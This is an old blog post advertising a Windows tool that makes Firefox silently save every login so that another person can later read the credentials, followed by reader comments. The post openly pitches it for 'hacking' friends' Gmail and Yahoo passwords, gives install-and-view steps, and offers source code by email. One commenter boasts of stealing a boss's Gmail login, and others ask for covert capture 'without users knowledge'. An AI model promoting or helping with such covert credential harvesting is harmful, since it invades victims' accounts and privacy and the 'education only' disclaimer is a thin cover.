Translate

Saturday, September 18, 2010

Firefox Password Silent Saver

FireFox Password HACKER
PLEASE USE THIS TOOL FOR EDUCATION PURPOSE ONLY

                       Hi Here I am introducing a software, which will store all username and password of the user who uses Mozilla Firefox browser  (Without showing popup button like below). With the help of this software we can hack user name and password of users.
                     In Firefox, even if you have the option “Security Remember passwords for sites” checked in Tools > Options, the browser will still display a notification bar at the top that asks “Do you want Firefox to remember the password for “Username” on website.com?” with three buttons “Remember”, “Never for This Site” and “Not Now”. If user pressed on "Remember" button password will store on firefox database and we can see the password. If user preseed other button we will not get his/her password.
                            My idea is to block this message box(see above) and click on Remember Button. The first thing that came to my mind was perhaps there is an addon that can do this but I couldn’t find any addon that can make Firefox auto save password without prompting. After spending nearly 2 hours researching on how Firefox saves the password, I managed to find a way on how to make Firefox save the login information to the Firefox Saved. So I am created this software.Please dont use this tool for hacking confidential data(s). Please use this tool for education purpose only

Steps
1) Download and Install PravySoft Firefox Hacker software.(Don’t change installation path)

2) Restart Firefox
3) Open Tools menu of Firefox

4) Select Security Tab
5) click on saved Password Button as shown in the figure


6) There you can see a window

7) You Completed you can see password, username and website address of users)


For source code please email me pravymon@gmail.com or visit http://pravysoft.eu5.org

Now i am finalizing my blog content .This software is the best tool to hack GMAIL,YAHOO,REDIFFMAIL passwords.I think you got the answer for the question  how to hack your friends username and password.


After effects
1. I got many congratulations from all over the world.
2. Firefox realised the bug, And added new secure structure for its new edition to prevent my hacking.(But dear friends I believes some  more loop holes are there for firefox, But for security purpose I am not including that problems here, If you want to know more just contact me with your profile, PravySoft team will answer all of your queries)
3. Many famous software like tuneup utilities will give warning if you are not setted your Master password for firefox





20 comments:

  1. Thank you very much for your mozilla firefox silent hacker software.very nice work.please emai mme the source code of this software.

    reshmanhg@gmail.com

    ReplyDelete
  2. its working nice.

    with the help of this software i'm able to hack my boss's login username and password of gmail

    once again thank you

    Ratheesh.V

    ReplyDelete
  3. Great work bhai
    Please give me the linux version of the same software if available.

    If you dont mind allow me to feed Pravysoft Firefox silent password saver.

    ReplyDelete
  4. Great boss...

    Please give me source code of firefox automatic password saver software

    ReplyDelete
  5. silent trick...

    how to store google chrome and opera data...

    i want to hack gmail and yahoo password and auto save into a file.without users knowledge.please give linux version of firefox password saver.

    ReplyDelete
  6. can you silent the "would you like to change the current stored password prompt"

    ReplyDelete
  7. Hi martin

    i will update software to remove "would you like to change the current stored password" prompt soon

    ReplyDelete
  8. Thank you praveen,can i add this link to my web page..

    Please inform me.

    Ragunathan
    Dept head computer science nit madurai

    ReplyDelete
  9. votre mot de passe hacker le silence est vraiment super, je suis ton fan praveen thappily
    philuo kurpalo

    ReplyDelete
  10. how can I download this software?
    I've tried few things but nothing works with FF4. I'd love to try your solution!

    ReplyDelete
  11. I meant - how can I download new version for FF4? as this one doesn't work with FF4 :(

    ReplyDelete
  12. Hi FF4 changed the file ,i used to hack.

    so dear friends please wait for my software updation.i'm on final stage.....

    ReplyDelete
  13. Thanks for source code sir

    ReplyDelete
  14. Nice work. Thank you for your mozilla firefox silent hacker software.please email me the source code of this software.

    polash25@hotmail.com

    ReplyDelete
  15. good work.is iit possible to store passwords for other browsers like google chrome, safari, internet explorer?

    if so please upload to your web site

    ReplyDelete
  16. Thank you praveen thappily,good work.

    ReplyDelete
  17. doesnt work on FF11?:(

    ReplyDelete
  18. Sir,

    Thank you for your source code

    ReplyDelete
  19. very Good work sir.
    Really rocking

    ramesh P

    ReplyDelete

Please type your suggestions, doubts and enquiries here..